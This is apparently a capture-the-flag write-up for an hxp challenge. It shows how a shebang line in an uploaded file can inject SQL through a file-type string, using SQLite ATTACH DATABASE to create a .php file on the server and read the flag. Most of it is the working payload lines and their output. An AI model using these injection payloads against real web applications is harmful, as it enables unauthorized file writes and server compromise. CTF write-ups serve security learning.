Using the shebang ('#!') you can control part of the type string and perform a sql injection.
1. Create two files pwn1 and pwn2. Using two files is necessary because finfo->file cuts your string when its too long.
pwn1:
```
#!/');ATTACH DATABASE './p.php' AS p;CREATE TABLE p.p(t text);--
```
pwn2:
```
#!/');ATTACH DATABASE './p.php' AS p;INSERT INTO p.p VALUES ('');--
```
2. Upload both and just access files/(id)/p.php to get your flag:

```
SQLite format 3???@ ??????.0: ??�?�$??????9tablepp?CREATE TABLE p(t text) ??�?�???Ghxp{I should have listened to my mum about not trusting files about files}
```